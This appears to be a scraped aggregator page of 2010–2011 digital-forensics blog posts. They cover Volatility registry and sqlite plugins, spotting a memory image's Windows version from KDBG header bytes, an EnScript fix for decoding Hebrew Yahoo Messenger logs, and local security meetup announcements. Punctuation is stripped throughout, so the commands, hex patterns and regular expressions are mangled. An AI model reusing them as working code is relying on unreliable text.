http://www.secuobs.com/revue/news/295116.shtmlhttp://www.secuobs.com/revue/news/295116.shtml Secuobs.com : 2011-03-25 21:58:14 - JL's stuff - As a lot of you already know, Volatility has some pretty cool registry plugins You can use hivescan to look for registry hives CMHIVE , hivelist to locate virtual and physical addresses of registry hives and printkey to print out keys for a specified hive, whose virtual address is found from hivelist In Volatility 13, you had to specify CMHIVE offset obtained from hivescan for hivelist in order to get the virtual address for a hive to use with printkey In Volatility 14, hivelist inherits hivescan and obtains the CMHIVE offsets removing one extra step and making it easier for the user We still have to provide a virtual address obtained by hivelist to printkey in order to print a key from a particular registry Suppose you don't know which registry contains the key, or you are a little clumsy about which offset you gave printkey, or maybe you want the same key from multiple hives like all users for example Well, I know I've personally had some of these issues and I'm sure others have as well - Recently I modified printkey to include a brute-force option to try to obtain a particular key from all hives and thought I'd share this in case anyone else might find it useful The idea works similar to how hivelist was written to inherit from hivescan printkey inherits hivelist and can obtain the offsets for all hives if run in brute-force mode It also retains the previous usage so you can specify an offset Let's see some examples So suppose we want to get the computer name from this image How do we get that So normally you have to get a list of registry hives python volpy -f ds_fuzz_hidden_procimg hivelist Volatile Systems Volatility Framework 14_rc1 Virtual Physical Name 0xe1ada008 0x0b46c008 Device HarddiskVolume1 Documents and Settings moyix Local Settings Application Data Microsoft Windows UsrClassdat 0xe1ad0880 0x0b339880 Device HarddiskVolume1 Documents and Settings moyix NTUSERDAT 0xe1ac09e8 0x0b21b9e8 Device HarddiskVolume1 Documents and Settings LocalService Local Settings Application Data Microsoft Windows UsrClassdat 0xe1a9f008 0x0b28b008 Device HarddiskVolume1 Documents and Settings LocalService NTUSERDAT 0xe1797a60 0x0951da60 Device HarddiskVolume1 Documents and Settings NetworkService Local Settings Application Data Microsoft Windows UsrClassdat 0xe1790820 0x0960f820 Device HarddiskVolume1 Documents and Settings NetworkService NTUSERDAT 0xe1534820 0x032a9820 Device HarddiskVolume1 WINDOWS system32 config software 0xe1536820 0x032ab820 Device HarddiskVolume1 WINDOWS system32 config SECURITY 0xe14771f8 0x07fc91f8 Device HarddiskVolume1 WINDOWS system32 config default 0xe1482008 0x07f93008 Device HarddiskVolume1 WINDOWS system32 config SAM 0xe13725b8 0x0241d5b8 no name 0xe1018388 0x02200388 Device HarddiskVolume1 WINDOWS system32 config system 0xe1008b60 0x020c4b60 no name 0x80670a8c 0x00670a8c no name From the SYSTEM registry we need this key ControlSet001 Control ComputerName ComputerName We find the virtual offset and specify that in the commandline along with the key python volpy -f ds_fuzz_hidden_procimg printkey -o 0xe1018388 -K 'ControlSet001 Control ComputerName ComputerName' Volatile Systems Volatility Framework 14_rc1 Legend S Stable V Volatile Registry Device HarddiskVolume1 WINDOWS system32 config system Key name ComputerName S Last updated 2008-10-21 17 48 29 Subkeys Values REG_SZ ComputerName S GINEVRA Nice Ok, suppose you didn't know you needed to get this information from the SYSTEM registry You can use the brute-force option -b python volpy -f ds_fuzz_hidden_procimg printkey -b -K 'ControlSet001 Control ComputerName ComputerName' Volatile Systems Volatility Framework 14_rc1 WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of S-1-5-21-725345543-1292428093-2147272213-1003_Classes WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of PROTOHIV WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of S-1-5-19_Classes WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of PROTOHIV WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of S-1-5-20_Classes WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of PROTOHIV WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of PROTOHIV WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of SECURITY WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of PROTOHIV WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of SAM WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of HARDWARE Legend S Stable V Volatile Registry Device HarddiskVolume1 WINDOWS system32 config system Key name ComputerName S Last updated 2008-10-21 17 48 29 Subkeys Values REG_SZ ComputerName S GINEVRA WARNING volatilitywin32rawreg Couldn't find subkey ControlSet001 of REGISTRY Hrmmmm notice that you get a lot of debug warnings in addition to the correct output for this key This is because normally you would want to know if the key is not found and as each hive is queried for the key, failed attempts appear in output However in this case, we know it's not going to be found in all of the registries, so we don't care about these warnings You could comment out the piece of code in volatility win32 rawregpy that gives this warning, or you could use another plugin supplied by Mike Auty called disablewarningspy This plugin disablewarningspy is located in the contrib plugins folder when you first download Volatility from the Google SVN In order to use it, you must first move it to your plugins directory So from the Volatility root folder do the following mv contrib plugins disablewarningspy volatility plugins Now we can run the printkey plugin with brute-force option and disable debug statements with two extra switches -d -W python volpy -f ds_fuzz_hidden_procimg printkey -b -d -W -K 'ControlSet001 Control ComputerName ComputerName' Volatile Systems Volatility Framework 14_rc1 Legend S Stable V Volatile Registry Device HarddiskVolume1 WINDOWS system32 config system Key name ComputerName S Last updated 2008-10-21 17 48 29 Subkeys Values REG_SZ ComputerName S GINEVRA Want to see output from multiple hives Let's look at the Software Microsoft Windows NT CurrentVersion WinLogon key from user hives python volpy -f ds_fuzz_hidden_procimg printkey -K 'Software Microsoft Windows NT CurrentVersion WinLogon' -b -d -W Volatile Systems Volatility Framework 14_rc1 Legend S Stable V Volatile Registry Device HarddiskVolume1 Documents and Settings moyix NTUSERDAT Key name Windows S Last updated 2008-09-19 20 29 55 Subkeys S CurrentVersion S Shell S ShellNoRoam Values Legend S Stable V Volatile Registry Device HarddiskVolume1 Documents and Settings LocalService NTUSERDAT Key name Windows S Last updated 2008-09-19 20 28 14 Subkeys S CurrentVersion S ShellNoRoam Values Legend S Stable V Volatile Registry Device HarddiskVolume1 Documents and Settings NetworkService NTUSERDAT Key name Windows S Last updated 2008-09-19 20 27 48 Subkeys S CurrentVersion S ShellNoRoam Values Legend S Stable V Volatile Registry Device HarddiskVolume1 WINDOWS system32 config default Key name Windows S Last updated 2008-09-19 16 17 14 Subkeys S CurrentVersion S ShellNoRoam Values Notice that the output is also slightly different, since printkey specifies which hive it got the information from Registry Path You can find the modified printkey plugin here Just replace your current printkey located in volatility plugins registry with this new one and you're set http://www.secuobs.com/revue/news/294256.shtmlhttp://www.secuobs.com/revue/news/294256.shtml Secuobs.com : 2011-03-22 21:46:40 - JL's stuff - There's an upcoming talk at The Center for Cybercrime Studies, John Jay College of Criminal Justice next week Tuesday March 29th, 2011 2 00 PM that may interest some of you in the NYC area Cyber Criminals Who are they Why are they successful How do we respond Kim Peretti Director, Forensic Services Practices PricewaterhouseCoopers LLP Formerly Senior Counsel US Dept of Justice, Criminal Division Computer Crime and Intellectual Property Section This session will walk through recent prosecutions of sophisticated hacking rings in order to provide insight into the individuals behind these types of crimes and why they are successful This presentation will also discuss the emerging area of cyber forensics and methods by which entities can better prevent, detect, and respond to cyber attacks on their systems Events will take place at John Jay College of Criminal Justice 899 Tenth Avenue Room 630T, Haaren Hall between 58th and 59th Streets RSVP to Nicole Daniels ndaniels jjaycunyedu 2122378920 http://www.secuobs.com/revue/news/293433.shtmlhttp://www.secuobs.com/revue/news/293433.shtml Secuobs.com : 2011-03-22 15:36:17 - JL's stuff - For those who can't wait for the official release of 14 I've updated the Volatility Full Dev Installation Wiki to include installation on Linux In case you want to automate installation you can use the new get_plugins script I've only tested it on Mac OSX and Ubuntu, but it should still install dependencies and Volatility 14 on other Linux distributions provided that you have your supporting libraries like libpcre installed already Feel free to look at the code before running however - Caveat There is still an issue with the Distorm3 library on Mac OSX and you'll have to compile and install that one manually http://www.secuobs.com/revue/news/293311.shtmlhttp://www.secuobs.com/revue/news/293311.shtml Secuobs.com : 2011-01-06 00:13:58 - JL's stuff - There is an NYC4SEC meeting this month on 1 19 2011 This month our speaker is Jon Stewart who will be giving a talk about his new tool Lightgrep Details are below Lightgrep - Fast Keyword Searching for Forensics Dislike waiting 5 days for your keyword search to complete Been brought to tears by thousands of keywords Lost faith in your forensics tools when they didn't find all the hits they should have Come to this talk to see the first public demonstration of Lightgrep, a new regular expressions search tool designed specifically for forensics Search is a fundamental part of forensics, useful not only for discovering relevant documents and snippets of text, but also artifacts, files in unallocated space, and file signature analysis We will discuss the basic principles behind how a grep search works, why it's important to consider how multiple keywords are handled, and how to validate a search tool's results Finally, we'll show Lightgrep, a tool that allows for fast searching for thousands of keywords, with full EnCase integration Please join us on Wednesday, January 19th, 7 00pm at John Jay College - Forensic Computing Program and the Center for Cybercrime Studies 899 Tenth Avenue - btwn 58th 59th Room 610T - 6th Floor Jon Stewart is a software developer and co-founder of Lightbox Technologies, Inc Prior to Lightbox, Jon was a senior developer and consultant with Guidance Software, where he worked heavily on the EnScript programming language and created EnCase eDiscovery Jon lives in Arlington, VA and blogs regularly about EnScript, programming, and forensics at http codeslackblogspotcom Don't forget to RSVP Thanks to Douglas Brush, Prof Bilal Khan, Prof Douglas Salane and Prof Richard Lovely for helping to make this possible http://www.secuobs.com/revue/news/276135.shtmlhttp://www.secuobs.com/revue/news/276135.shtml Secuobs.com : 2010-12-12 22:41:51 - JL's stuff - Have you ever been given a memory image to examine and not known what OS it was Or maybe you were told it was X when it was really Y Or perhaps you have a collection of images that may not be labeled correctly So how do you figure out the OS of an unknown Windows image Strings You could use strings to look for clues of the OS type For example looking for the version numbers 1 You can often find this in close proximity to a DLL name Two examples XP and Windows 7 are below Windows XP 512600 2546060 5126000 xpclient010817-1148 2546134 InternalName 2546160 HCAppResdll 2546194 LegalCopyright 2546226 Microsoft Corporation All rights reserved 2546322 OriginalFilename 2546356 HCAppResdll Windows 7 61760016385 win7_rtm090713-1255 1335896 61760016385 win7_rtm090713-1255 1335978 InternalName 1336004 BlbEventsdll 1336038 LegalCopyright 1336070 Microsoft Corporation All rights reserved How do you determine if the memory image is from a x86 or x64 machine Well, here you can look for environmental variables like PROCESSOR_ARCHITECTURE and PROCESSOR_ARCHITEW6432 used for WOW64 2 An example from x86 and x64 machines PROCESSOR_ARCHITECTURE x86 PROCESSOR_IDENTIFIER x86 Family 6 Model 37 Stepping 5, GenuineIntel PROCESSOR_ARCHITECTURE AMD64 PROCESSOR_IDENTIFIER Intel64 PROCESSOR_ARCHITECTURE x86 PROCESSOR_ARCHITEW6432 AMD64 More details about these variables can be found here Still, this is more labor intensive than it need be Using _DBGKD_DEBUG_DATA_HEADER64 Remembering a blogpost Moyix wrote about finding kernel global variables in Windows I figured each OS would have a different size after the OwnerTag defined in wdbgexth typedef struct _DBGKD_DEBUG_DATA_HEADER64 LIST_ENTRY64 List ULONG OwnerTag KDBG ULONG Size Different for each OS DBGKD_DEBUG_DATA_HEADER64, PDBGKD_DEBUG_DATA_HEADER64 Moyix gives us the pattern to search for regarding x86 OSes since the end of LIST_ENTRY64 will be 0 for x86 machines 3 x00 x00 x00 x00 x00 x00 x00 x00KDBG First let's try to find the sizes for each OS xxd xpsp3x86dd less skip 0000b70 6780 0000 0000 0000 0000 4b44 4247 9002 gKDBG skip xxd win7x86dd less skip 0000bf0 ffff ffec 6fbb 83ec 6fbb 8300 0000 0000 oo 0000c00 0000 004b 4442 4740 0300 0000 8084 8300 KDBG skip After examining XP, W2K3, Vista, W2K8 and Windows 7 machines and different service packs , this is what we get Windows 2000 value not done personally, but taken from Moyix's blog 3 OS Size Windows 2000 x08 x02 XP x90 x02 W2K3 x18 x03 Vista x28 x03 W2K8 x30 x03 Windows 7 x40 x03 Now we need to find the pattern for x64 systems as well We could do this with a hexdump of memory images to find the KDBG pattern xxd win7x64dd less skip 0000080 f8ff ff10 44a1 0200 f8ff ff4b 4442 4740 DKDBG 0000090 0300 0000 f080 0200 f8ff ff60 8f87 0200 skip xxd w2k8x64dd less skip 0000f10 f8ff ff40 f878 0100 f8ff ff4b 4442 4730 xKDBG0 0000f20 0300 0000 c060 0100 f8ff ff60 b865 0100 e skip After examining several x64 dumps, the pattern that seemed universal to them was ' x00 xf8 xff xffKDBG' The header sizes also appear to remain the same for x64 and x86 machines So there it is You can search for a unique pattern in the memory image in order to figure out what OS it is Some examples Windows 7x86 ' x00 x00 x00 x00 x00 x00 x00 x00KDBG x40 x03' W2K3 x86 ' x00 x00 x00 x00 x00 x00 x00 x00KDBG x18 x03' W2K8 x64 ' x00 xf8 xff xffKDBG x30 x03' You could very easily write a Python script to identify Windows memory images using this technique, but you don't have to This has already been incorporated into the Volatility 14 framework in the imageinfopy plugin Thanks to Mike Auty ikelos for doing the honors - References 1 List of Windows Versions http enwikipediaorg wiki List_of_Microsoft_Windows_versions 2 HOWTO Detect Process Bitness http blogsmsdncom b davidwang archive 2006 03 26 howto-detect-process-bitnessaspx 3 Finding Kernel Global Variables in Windows http moyixblogspotcom 2008 04 finding-kernel-global-variables-inhtml http://www.secuobs.com/revue/news/271182.shtmlhttp://www.secuobs.com/revue/news/271182.shtml Secuobs.com : 2010-12-06 17:58:34 - JL's stuff - I've finally gotten around to updating the get_plugins script I wrote a while back and finally gotten around to blogging about it This is due to a few changes in plugins, dependencies and to address difficulties mentioned in lorgor's blog MHL has also updated malfind2 to work with Yara 14a, so this script is compatible with those changes I have only tested this on Ubuntu and Mac OSX with MacPorts installed 1 You must run this script as root 2 This script also installs Volatility using SVN If you are running Ubuntu or Mac it will check that SVN is installed, and if not, will install it and pull down Volatility in the current directory 3 If you are running Ubuntu or Mac OSX, this script will install other dependencies you will need like pcregrep libpcre -dev python-dev for Ubuntu or pcre pcre for Mac 4 This script installs dependencies pefile, libdasm, pycrypto, yara-python 14a, as well as all known Volatility plugins, including the newer VAP ones from MHL You still have to install Inline Python on your own You can find the script in my GitHub repository or as raw text here http://www.secuobs.com/revue/news/269674.shtmlhttp://www.secuobs.com/revue/news/269674.shtml Secuobs.com : 2010-11-18 18:26:38 - JL's stuff - There have been some interesting items in the last week Brian Carrier has started a new Open Source Digital Forensics website It offers a quick way for people to find useful tools, papers and procedures Dave Kovar released a new version of analyzeMFT Not sure how he's had time to work on this, what with his busy glob-trotting lifestyle, but he's done it again - Lance Mueller blogged recently about an EnScript that uses MSSQL for faster filtering of files by hash values It was provided by Oliver Höpli and as Jon Stewart Mr EnScript can tell you, it's quite useful For the iPhone forensics peeps, an iPhone Forensics White Paper was released on viaForensics There was also an open source iPhone Analyser released on Sourceforge http://www.secuobs.com/revue/news/265831.shtmlhttp://www.secuobs.com/revue/news/265831.shtml Secuobs.com : 2010-11-17 15:51:53 - JL's stuff - There is a NYC4SEC meeting tonight 11 17 2010 This month our speaker is Professor Nasir Memon who will be giving a presentation on digital image forensics Description below Photo Forensics There is More to a Picture Than Meets the Eye When presented with a device full of active or deleted data what do you know about the images Can you recover them all Can you tell which camera they are taken with Can you tell if they are manipulated Can you find from the Internet all other pictures taken from the same camera Forensics professionals all over the world are increasingly encountering such questions Given the ease by which digital images can be created, altered, and manipulated with no obvious traces, digital image forensics has emerged as a research field with important implications for ensuring digital image credibility This presentation provides an overview of recent developments in the field, focusing on three problems First, collecting image evidence and reconstructing them from fragments, with or without missing pieces This involves sophisticated file carving technology Second, attributing the image to a source, be it a camera, a scanner, or a graphically generated picture The process entails associating the image with a class of sources with common characteristics device model or matching the image to an individual source device, for example a specific camera Third, attesting to the integrity of image data This involves image forgery detection to determine whether an image has undergone modification or processing after being initially captured So please join us on Wednesday, November 17th, 7 00pm at John Jay College John Jay College - Forensic Computing Program and the Center for Cybercrime Studies 899 Tenth Avenue - btwn 58th 59th Room 610T - 6th Floor Don't forget to RSVP Thanks to Douglas Brush, Joe Garcia, Prof Bilal Khan and Prof Douglas Salane for making this possible http://www.secuobs.com/revue/news/265517.shtmlhttp://www.secuobs.com/revue/news/265517.shtml Secuobs.com : 2010-10-19 18:07:32 - JL's stuff - We have another NYC4SEC meetup next week on October 27th Halloween Edition - Are those knocks on your firewall doors for tricks or treats Either way you have to realize one of the largest threats to your environment is the human element and none other than super malware and security forensicator Lenny Zeltser will be giving us a special Halloween talk about how attackers can trick you or the people inside your organization to get access to treats Ok, no more puns John Jay College has reached out and offered to host this and future events for NYC4SEC so lets spread the word and show them that the NYC cyber security community is strong in numbers and appreciate their support Lenny Zeltser - Knock, Knock How Attackers Use Social Engineering to Bypass Your Defenses Why bother breaking down the door if you can simply ask the person inside to let you in Social engineering works, both during penetration testing and as part of real-world attacks This talk explores how attackers are using social engineering to compromise defenses It presents specific and concrete examples of how social engineering techniques succeeded at bypassing corporate security defenses Lenny Zeltser will review how attackers have bypassed technological controls by making use of social engineering techniques Attend this engaging talk to improve the relevance of your security awareness training and to adjust your defenses by revisiting your perspective of the threat landscape John Jay College - Forensic Computing Program and the Center for Cybercrime Studies 899 Tenth Avenue - btwn 58th 59th Room 610T - 6th Floor More details and RSVP here NYC4SEC RSVP Thanks to Douglas Brush, Joe Garcia, Prof Bilal Khan and Prof Douglas Salane for making this possible http://www.secuobs.com/revue/news/258263.shtmlhttp://www.secuobs.com/revue/news/258263.shtml Secuobs.com : 2010-09-17 15:54:35 - JL's stuff - I have recently updated the Volatility sqlite3 plugins for 132 branch with some minor changes 1 Removal of path from image name 2 Lowercase of all processes, dlls, filenames, modules etc To make things even more interesting, I have converted some of the scanning code to output in sqlite3 as well tar -cvzf vol_sql-03tgz vol_sql-03 vol_sql-03 vol_sql-03 connections_2py vol_sql-03 connscan2sqlpy vol_sql-03 dlllist_2py vol_sql-03 driverscan2sqlpy vol_sql-03 files_2py vol_sql-03 filescan2sqlpy vol_sql-03 getsidspy vol_sql-03 modscan2sqlpy vol_sql-03 modules_2py vol_sql-03 pslist_2py vol_sql-03 psscan3sqlpy vol_sql-03 sockets_2py vol_sql-03 sockscan2sqlpy Schema CREATE TABLE connections pid integer, local text, remote text, memimage text CREATE TABLE connscan2 pid integer, local text, remote text, memimage text CREATE TABLE dlls pname text, pid integer, cmdline text, base text, size text, path text, memimage text CREATE TABLE driverscan2 paddr text, objtype text, pointers integer, handles integer, start text, size text, srvckey text, driver text, path text, memimage text CREATE TABLE files pid integer, file text, num integer, memimage text CREATE TABLE filescan2 paddr text, objtype text, pointers integer, handles integer, access text, file text, memimage text CREATE TABLE modscan2 file text, base text, size text, name text, memimage text CREATE TABLE modules file text, base text, size text, name text, memimage text CREATE TABLE process pname text, pid integer, ppid integer, thrds text, hndl text, ctime text, memimage text CREATE TABLE psscan3 pid integer, ppid integer, ctime text, etime text, offset text, pdb text, pname text, memimage text CREATE TABLE sids pname text, pid integer, sid_string text, sid_name text, memimage text CREATE TABLE sockets pid integer, port integer, proto text, ctime text, memimage text CREATE TABLE sockscan2 pid integer, port integer, proto text, ctime text, offset text, memimage text So what kinds of queries could we make with the output of these plugins Here are few brief examples Suppose you want to focus on one pid select from files where pid pid select from connections where pid pid etc Suppose you want to link up connections output with the process information select processpname, connections from connections join process where processpid connectionspid order by connectionspid Suppose you have information from more than one image in your database and want to see if there are any dlls processes files in one image not represented in the others select from dlls where path not in select path from dlls where memimage is not image name Suppose you don't care about dlls with a certain path, like winsxs for example select from dlls where path not in select path from dlls where memimage is not image name and path not like 'pourcentswinsxspourcents' Want to output all files in alphabetical order select from files order by file or by PID select from files order by pid Now that we have sqlite output for some of the scanning plugins we can quickly compare for information missing from regular plugins Here's an example of pslist vs psscan3 on an image released by Moyix in his post releasing psscan3 select psscan3pid, psscan3ppid, psscan3ctime, psscan3pname from psscan3 where pid not in select pid from process order by pid 00idle 592360Sat Nov 15 23 42 56 2008csrssexe 660616Sat Nov 15 23 42 56 2008servicesexe 828660Sat Nov 15 23 42 57 2008svchostexe 924660Sat Nov 15 23 42 57 2008svchostexe 992660Sat Nov 15 23 43 25 2008algexe 1016660Sat Nov 15 23 42 57 2008svchostexe 16961516Wed Nov 26 07 43 28 2008network_listene Well, I'm sure you can think up a lot more crazy queries as well The older sqlite plugins usage can be found here The newly converted plugins usage is volatility plugin -f image -d sqlite db At some point I'll cover output rendering in the 14 branch, which is more interesting - Until then Happy hunting http://www.secuobs.com/revue/news/248917.shtmlhttp://www.secuobs.com/revue/news/248917.shtml Secuobs.com : 2010-09-17 15:54:35 - JL's stuff - The next NYC4SEC meeting will take place on September 16, 2010 at 7 00PM at Pace University Details Grab your TrapperKeepers I'm rockin' the red Lambo , your Saved By the Bell book covers and Garbage Pail Kids cards to stick on the inside of your locker because it's back to school time Pace University is our gracious host and our speaker will be Ovie Carroll who will be in town teaching a SANS Forensics 408 Computer Forensic Essentials Course here in NYC and offered to stop by after a day of training to meet our group If you would like to attend the 408 course Ovie has provided a special offer for a class discount Use COINS-OC to get 10pourcents off and to make sure to get into class http wwwsansorg new-york-forensics-2010-cs descriptionphp tid 4207 More details to follow on specific room location for the NYC4SEC Meet-up but please get your parents to sign off on your NYC4SEC permission slips for Thursday, September 16th 7pm Thanks to Douglas Brush and Joe Garcia for arranging this event More details can be found here http wwwnyc4secinfo calendar 14520625 http://www.secuobs.com/revue/news/248916.shtmlhttp://www.secuobs.com/revue/news/248916.shtml Secuobs.com : 2010-07-26 06:37:06 - JL's stuff - I'm somewhat behind in my blogging In the past couple of weeks a few things of interest have come out Here are some highlights Moyix released psscan3 a robust process scanner He also released GDI Utilities for taking screenshots of memory dumps, which is VERY cool - Lenny Zeltser released REMnux a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software The distribution is based on Ubuntu which includes Volatility in its arsenal Detective Cindy Murphy published a guide on cell phone examinations, which is definitely worth a read My former boss and GSI alum, Jon Stewart Mr EnScript , has written two posts on the 3 laws of EnScript with a third post surely coming soon If you care anything about EnScript programming, these posts are definitely worth a read There have been some updates to some of the Sysinternals tools that you might want to check out F-Reponse now supports Android, which is pretty cool You can check out their blogpost which includes details and a video Into the Boxes is currently looking for collaborators for 0x2 Don't be shy, I know there are a lot of people out who could contribute an article for the next edition If you have an idea for an article, hit the call box http://www.secuobs.com/revue/news/243767.shtmlhttp://www.secuobs.com/revue/news/243767.shtml Secuobs.com : 2010-07-15 22:12:51 - JL's stuff - We will have another NYC4SEC meetup after Chris Pogue's talk on Sniper Forensics at The Next HOPE You can RSVP here Details This is the NYC4SEC after HOPE Meet-up for Sunday, July 18th at 6pm at Stout NYC on 33rd St btwn 6th 7th just across the street from the Hotel Pennsylvania Informal meet up to hang out and mingle to talk about the highlights of the HOPE conference I spoke with Chris Pogue who will be presenting at the conference on Sunday at 4pm - Sniper Forensics - Changing the Landscape of Modern Forensics and Incident Response and he said he will stop by to join us Checkout Chris s on his blog http thedigitalstandardblogspotcom C mon by to drink, talk and hang with others in the NYC InFosec community Thanks to Douglas Brush for setting this up - http://www.secuobs.com/revue/news/240931.shtmlhttp://www.secuobs.com/revue/news/240931.shtml Secuobs.com : 2010-07-12 02:52:27 - JL's stuff - Since access to my QC website has now expired, I've moved some of the stuff that was linked to there from this blog to here Future misc scripts will be dumped there as well http://www.secuobs.com/revue/news/239554.shtmlhttp://www.secuobs.com/revue/news/239554.shtml Secuobs.com : 2010-05-25 18:17:53 - JL's stuff - Some people have asked me about CEIC I will not be attending this year unfortunately I hope those of you who are currently there are having a blast though - http://www.secuobs.com/revue/news/225495.shtmlhttp://www.secuobs.com/revue/news/225495.shtml Secuobs.com : 2010-03-16 03:37:46 - JL's stuff - Just a bit of nonsense I discovered today Notice a theme http://www.secuobs.com/revue/news/201983.shtmlhttp://www.secuobs.com/revue/news/201983.shtml Secuobs.com : 2010-02-15 04:46:41 - JL's stuff - A former colleague of mine, Geoff Black, has a pretty cool timeline EnScript zip file available on his website I have been playing around with it for a little bit and have meant to blog about it for a while The contents of the zip are as follows Timeline ReportEnPack Timeline ReportEnScript actual code Timeline_Report_READMEpdf Timeline_Report_WHATSNEWpdf Include GNB_HTMLlibEnScript library file Include GNB_XMLlibEnScript library file I must say that it's nice that Geoff has given us the code to his Timeline script so that one can modify as desired It's also nice that he includes README and WHATSNEW files so you can have something to reference for past and present versions Simply unzip these items without the pdfs into your EnCaseX EnScript folder and you are ready to go You can run the script by either double clicking the EnPack or the EnScript, just make sure to add a disk image to the case first - When you run it you will see the following There are a lot of options you can choose Here's a closeup of the interface itself You can pick a certain time period with a start and stop date for the timeline boxed in blue You can pick the type of output you want boxed in pink , whether you want Records, Bookmards, a Tab Delimited report TSV , how many entries you'd like in each TSV file and whether or not you would like an HTML report better suited for IE or Firefox There are more Script Options and Time Options boxed in green that allow you to select files you want in the timeline report default is all files and which time entries you are interested in seeing default is all You can modify the order to the Output Fields boxed in red for the TSV file or remove fields that are not of interest Other fields are self explanatory While the script is running you can see the progress bar at the bottom right If you choose the HTML report option you may end up with several HTML files depending on how many files are selected and how many entries per file you have selected and if this is the case each file is named in order for example TimelineReport-FFhtml TimelineReport-FF2html TimelineReport-FF3html and so on You can see an example report below The latest change is highlighted, but you can see that some files might have the same time stamp for different fields In this case the file will be listed twice, once with Created highlighted and once with Accessed highlighted from the README You can check out some of Geoff's other EnScripts and CEIC presentations at his website http wwwgeoffblackcom forensics http://www.secuobs.com/revue/news/191874.shtmlhttp://www.secuobs.com/revue/news/191874.shtml Secuobs.com : 2010-02-14 22:28:05 - JL's stuff - There are a couple of publicly available Yahoo Messenger EnScripts EnPacks out, such as Yahoo Decoder in unallocated by Lance Mueller YahooMessenger-Parser by Paul Bobby Pretty useful scripts, however they don't handle right-to-left languages like Hebrew and Arabic Here are some before pics from my test run with Hebrew Lance Mueller's script's output Paul Bobby's scripts' output As you can see, well if you know what Hebrew letters are supposed to look like the letters come out as some gobbeldy-gook This is something I've been meaning to comment on for a while, having written various chat EnScripts at the beginning of my GSI employment I have just gotten around to it now The encryption method is the same for all unicode languages in that it is a byte-by-byte xor with the local username The problem is that the encoding becomes distorted when it is just saved in a string For example the letters ש and ל with encodings d7a9 and d79c respectively become c397 and c2a9 it is left as an exercise for the reader to figure out why So here comes a solution that I have used in the past The EnScripting language has a class called MemoryFileClass, which allows you to have in memory buffers that you can treat as files You can create them, open them, read and write to them as you would any other file So the idea is simple enough write to a memory buffer as you decrypt the message and then extract the message after all decryption has taken place This is accomplished by adding a couple of helper functions to Paul Bobby's code bool WriteBuffer MemoryFileClass file, char msg fileSetCodePage CodePageClass ANSI int temp msg fileWriteBinaryInt temp, 1 return fileIsValid void ReadBuffer MemoryFileClass file, String msg fileSetCodePage CodePageClass UTF8 fileSeek 0 fileReadString msg Now we can just call the functions as appropriate when decrypting and outputting the messages You can see the correct output after this modification below yeah, the conversation is lame and is just a test - The complete modified EnScript is available on the GSI forum registration required A thread on the GSI forum with Paul Bobby's fixed EnScript http://www.secuobs.com/revue/news/191827.shtmlhttp://www.secuobs.com/revue/news/191827.shtml Secuobs.com : 2010-02-14 17:36:42 - JL's stuff - I'm a little behind in my blogging, but I wanted to post about a few items that people might not have noticed So here it is just in time for Valentines Day Volatility SQL Plugins I modified the Volatility SQL output plugins slightly I changed the schema in the dlllist_2py plugin memory_plugins dlllist_2py Table Name dlls pname Process name changed pid Process ID cmdline Command Line text base Base Address size Size path Path of DLL memimage Memory image information was extracted from I also removed the Volatility files vutilspy and commandspy since there were two patches that address the items I changed in those files So now all you have to do is download Volatility from the SVN and unzip the plugins like before For the more adventurous, the SQL rendering plugins have been incorporated into the experimental branch of Volatility thank you Scudette You can download all branches with the following command svn checkout http volatilitygooglecodecom svn branches Vol_All For the experimental branch located in the experimental folder you must have Python 26 installed Volatility User Manual There is a new Volatility User Manual contributed to the VDP by Mark Morgan It is a compilation of past VDP articles and blogposts and covers all public plugins to date Shouts to Mark EnCase Enscripts Volatility Takahiro Haruyama's Memory Forensics Toolkit Takahiro Haruyama has released a new version of his Memory Forensics Toolkit I had played around with his previous version Now there is no excuse for the EnCase reliant not to get in on memory forensics - Shouts to Takahiro for making it easier for these users http://www.secuobs.com/revue/news/191795.shtmlhttp://www.secuobs.com/revue/news/191795.shtml Secuobs.com : 2010-02-07 23:11:31 - JL's stuff - I came across a post for the Memory Forensic Toolkit EnScript in the GSI Forum a few days ago I finally got a chance to play around with it a little today and this will be a very brief overview Prerequisite EnCase 614 or higher Simply download the toolkit from the link above and unzip it into your EnCaseXXX EnScripts folder You should see something like the following in your EnScript pane with a Windows 7 folder and Windows XP I have only tested the XP scripts at this time EnScripts available - List of all processes PsList - KMList Show all KMList - ConnList View all TCP connection ConnList - VadSearch VAD process in the search for a string - DllList Import the DLL process DllList Show - OpenFiles a list of open files that the process - ProcDump the process of extracting exe format - PsScan process information EPROCESS enumerates - ConnScan TCP connection information TCPT_OBJECT enumerates - KMScan Information KMScan kernel module LDR_MODULE enumerates - Vtypes Win32 x86 library to use the above script You can run these EnScripts on raw memory dumps, just make sure to check the blue box for the memory dump you would like to run the EnScript against Just double click the script you'd like to run Here's an example run of PsList And ConnScan The output is very similar to Volatility and goes to the console by default You can easily modify the script to output to a text file, Excel spreadsheet or any other output type you can think about, however For some EnScripts like dlllist, you are prompted for a PID to run it against You can modify the script to run agains all PIDs however, if desired There is also a Microsoft Crash Analyzer which I have yet to try http://www.secuobs.com/revue/news/189458.shtmlhttp://www.secuobs.com/revue/news/189458.shtml Secuobs.com : 2010-02-07 20:15:45 - JL's stuff - The other day on the volatility channel we were discussing how it might be nice to have a list of Perl Regex for common things like IP addresses etc Here are a few items we came up with IP Address 25 0-5 2 0-4 0-9 01 0-9 0-9 3 25 0-5 2 0-4 0-9 01 0-9 0-9 MAC Address a-fA-F0-9 2 5 a-fA-F0-9 2 URL httphttpsftpmail w Email A-Za-z0-9_pourcents - A-Za-z0-9- A-Za-z 2,4 You can find some other Regex expressions on the SANS blog however the regex expression for IP addresses matches items like 999999999999, which we know is not a valid email address There's a nice post by geek00l listed at the bottom of the SANS post which links to other interesting posts Other references of interest Regular-Expressionsinfo Regex Reference What would you like to add to the list http://www.secuobs.com/revue/news/189430.shtmlhttp://www.secuobs.com/revue/news/189430.shtml Secuobs.com : 2010-01-29 